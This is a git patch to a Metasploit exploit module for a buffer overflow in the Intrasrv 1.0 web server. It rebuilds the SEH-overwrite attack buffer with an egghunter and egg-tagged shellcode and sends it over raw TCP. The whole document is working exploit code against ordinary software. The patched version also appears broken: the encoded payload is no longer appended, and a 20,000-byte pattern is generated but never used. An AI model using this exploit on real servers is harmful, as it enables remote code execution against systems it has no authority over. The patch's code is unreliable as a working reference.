From 28f030494e3cb21b608c508bc47f59feb473c46d Mon Sep 17 00:00:00 2001
From: Nathan Einwechter <neinwechter@gmail.com>
Date: Mon, 12 Aug 2013 15:12:15 -0400
Subject: [PATCH] Use tcp mixin/clean corrupt bytes

---
 modules/exploits/windows/http/intrasrv_bof.rb | 44 +++++++++++--------
 1 file changed, 26 insertions(+), 18 deletions(-)

diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb
index ec77c95bd6..020e83b122 100644
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
-	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Egghunter
 
 	def initialize(info={})
@@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Payload'        =>
 				{
+					'Space' => '4660',
 					'StackAdjustment' => -3500,
 					'BadChars' => "\x00"
 				},
@@ -60,12 +61,16 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		res =  send_request_cgi({
-				'method' => 'GET',
-				'uri'    => "/"
-		})
+		begin
+			connect
+		rescue
+			print_error("Could not connect to target!")
+			return Exploit::CheckCode::Safe
+		end
+		sock.put("GET / HTTP/1.0\r\n")
+		res = sock.get
 
-		if res and res.headers['Server'] =~ /intrasrv 1.0/
+		if res =~ /intrasrv 1.0/
 			return Exploit::CheckCode::Vulnerable
 		else
 			return Exploit::CheckCode::Safe
@@ -75,27 +80,30 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		# setup egghunter
 		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
-				:checksum => true
+				:checksum=>true, :eggtag=>"w00t"
 			})
 
 		# setup buffer
-		buf = rand_text(target['Offset']-128)			# junk to egghunter
-		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128
+		buf = rand_text(target['Offset']-126)			# junk to egghunter at jmp -128
+		buf << hunter						# egghunter
 		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
 		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh
 
 		# Setup payload
-		shellcode = rand_text(50)				# pad payload
-		shellcode = egg + egg					# attach egg tags
-		shellcode << payload.encoded
+		shellcode = egg
+		# second last byte of payload gets corrupted - pad 2 bytes 
+		# so we don't corrupt the actual payload
+		shellcode << rand_text(2)
+		
+		msp = pattern_create(20000)
 
 		print_status("Sending buffer...")
-		send_request_cgi({
-				'method' => 'GET',
-				'uri'    => "/",
-				'vhost'  => buf,
-				'data'   => shellcode
-		})
+		# Payload location is an issue, so we're using the tcp mixin 
+		# instead of HttpClient here to maximize control over what's sent.
+		# (i.e. no additional headers to mess with the stack)
+		connect
+		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+		disconnect
 	end
 end